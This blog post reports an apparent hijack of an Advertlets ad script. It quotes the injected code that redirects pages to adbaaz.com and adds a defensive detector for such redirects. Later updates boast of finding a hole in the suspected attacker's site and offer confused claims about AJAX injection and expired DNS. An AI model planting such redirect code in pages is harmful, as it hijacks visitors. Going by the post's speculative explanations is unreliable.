Jan 05
Today at 5.00 p.m. (GMT +8) I’m the first to notice Advertlets being hacked by adbaaz.com (see whois). It’s not hard for me to see where they have hacked advertlets.com. They have replaced the “http://apps.advertlets.com/adl-js/savvy/savvy.lite.animator.js” file with:
    if( cHeight <= 200 )
    {
        window.top.location = "http://www.adbaaz.com/?dn=apps.advertlets.com&flrdr=yes&nxte=js&prvtof=8b2VkUqfXDCVzkFKsQ1rPbXbLzl10g%3D%3D";
    }
How did they inject it? Have you heard of AJAX injection?
SOLUTION
Temporarily remove your Advertlets plugin until Advertlets makes changes to their code!
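A publisher-side check for this kind of replacement, as an added example that is not from the original post or from Advertlets: it scans a fetched third-party script body for code that navigates the page to a host outside an allowlist. The function name, the allowlist parameter and the sample strings are assumptions (the sample is shortened from the snippet above), and only string-literal targets are detected.

```javascript
// Added example (not Advertlets code): flag script bodies that navigate the
// page (window/top/parent location, location.replace/assign) to a foreign host.
const NAV_SINK = new RegExp(
  // sink: [window.|document.|top.|parent.|self.]*location[.href], not a property of another object
  String.raw`(?<![\w$.])((?:(?:window|document|top|parent|self)\.)*location(?:\.href)?)` +
  // assignment (but not == / ===) or a replace()/assign() call
  String.raw`\s*(?:=(?!=)|\.(?:replace|assign)\s*\()\s*` +
  // string-literal target; curly quotes appear in blog-rendered copies of code
  String.raw`["'\u201c\u2018]([^"'\u201c\u201d\u2018\u2019]+)["'\u201d\u2019]`,
  'g');

// Returns one finding per navigation whose target host is neither the
// script's own host nor listed in allowedHosts (hypothetical parameter).
function findForeignNavigations(source, scriptUrl, allowedHosts = []) {
  const allowed = new Set([new URL(scriptUrl).hostname, ...allowedHosts]);
  const findings = [];
  for (const m of source.matchAll(NAV_SINK)) {
    let host = null;
    try {
      // Relative targets resolve against the script URL and stay on its host.
      host = new URL(m[2], scriptUrl).hostname;
    } catch (_) {
      // Unparseable target: keep host null so it is still reported.
    }
    if (host === null || !allowed.has(host)) {
      findings.push({ sink: m[1], url: m[2], host });
    }
  }
  return findings;
}

// Script URL from the post; both bodies below are constructed samples.
const SCRIPT_URL = 'http://apps.advertlets.com/adl-js/savvy/savvy.lite.animator.js';
const REPLACED_BODY =
  'if( cHeight <= 200 )\n{\n' +
  'window.top.location = "http://www.adbaaz.com/?dn=apps.advertlets.com&flrdr=yes";\n}';
const BENIGN_BODY =
  'if (window.location.href == "http://www.example.com/") { location.href = "/help.html"; }';

console.log(findForeignNavigations(REPLACED_BODY, SCRIPT_URL)); // one finding
console.log(findForeignNavigations(BENIGN_BODY, SCRIPT_URL));   // no findings
```

Run against each third-party script a page includes, a non-empty result is a reason to pull the include until the provider explains the change.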
UPDATE AT 19:16: It’s not hard to determine who is behind this adbaaz.com. I managed to get his other main website, http://www.clckm.com/, and guess what! He is a lousy programmer. I managed to find a hole in his website!


So I wonder, who is the real hacker!!
MORE UPDATE AT 19:46 – After digging into why everything happened, I found something embarrassing about the Advertlets.com DNS..


When the DNS expired, it’s an open port. Is that true? So people with high knowledge will utilize this weakness. Suddenly I realize.
WTF!! Advertlets don’t have enough money or they don’t implement project management carefully. WHAT A FLAW!!